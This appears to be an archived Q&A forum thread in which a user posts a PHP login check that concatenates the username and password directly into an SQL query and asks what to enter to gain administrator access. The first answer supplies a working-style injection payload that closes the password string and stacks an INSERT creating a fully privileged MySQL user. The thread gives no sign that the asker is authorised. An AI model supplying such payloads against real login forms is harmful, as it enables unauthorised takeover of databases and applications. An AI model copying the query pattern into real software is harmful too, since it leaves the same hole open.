can anyone tell me what i can put in the input fields to get administration options... an sql injection ... with these terms... of action...
========== its php and $username and $password are the inputs...
if ($username && $password){
$query = sprintf("SELECT * FROM login WHERE username = '$username' and password = '$password'");
$result = mysql_query($query);
$account = mysql_fetch_array($result);
}
if ($account){
$_SESSION['id'] = $account['id'];
header("location:admin.php");
exit;} else { echo " u are no admin.... ";}
=======
2007-12-16 09:55:11 · 2 answers · asked by truepal20032001 2 in Computers & Internet ➔ Programming & Design
yes, i mean the application admin... just assume the table names as you desire...
2007-12-18 15:12:32 · update #1
Do you mean admin permissions for the database or the application? It sounds like you mean the application, in which case you haven't provided enough information. You'd need to know how admins are specified in the database.
If you do mean the database, however, something like this might do the job:
$username = "whatever";
$password = "password'; INSERT INTO `user` ( `Host` , `User` , `Password` , `Select_priv` , `Insert_priv` , `Update_priv` , `Delete_priv` , `Create_priv` , `Drop_priv` , `Reload_priv` , `Shutdown_priv` , `Process_priv` , `File_priv` , `Grant_priv` , `References_priv` , `Index_priv` , `Alter_priv` , `Show_db_priv` , `Super_priv` , `Create_tmp_table_priv` , `Lock_tables_priv` , `Execute_priv` , `Repl_slave_priv` , `Repl_client_priv` , `ssl_type` , `ssl_cipher` , `x509_issuer` , `x509_subject` , `max_questions` , `max_updates` , `max_connections` )
VALUES (
'localhost', 'me', 'mypass', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', '', '', '', '', '0', '0', '0'
);";
For that to work, you'd have to assume the site admin is dumb enough to run general queries using a DB user with sufficient privileges to run that query (like root).
2007-12-16 13:53:45 · answer #1 · answered by Wiseguy 4 · 0⤊ 0⤋
The following source link should be of interest.
Also, standards dictate that we provide full URL (http:// and all) for header() based redirections.
2007-12-16 18:07:00 · answer #2 · answered by Agent Feyd 4 · 0⤊ 0⤋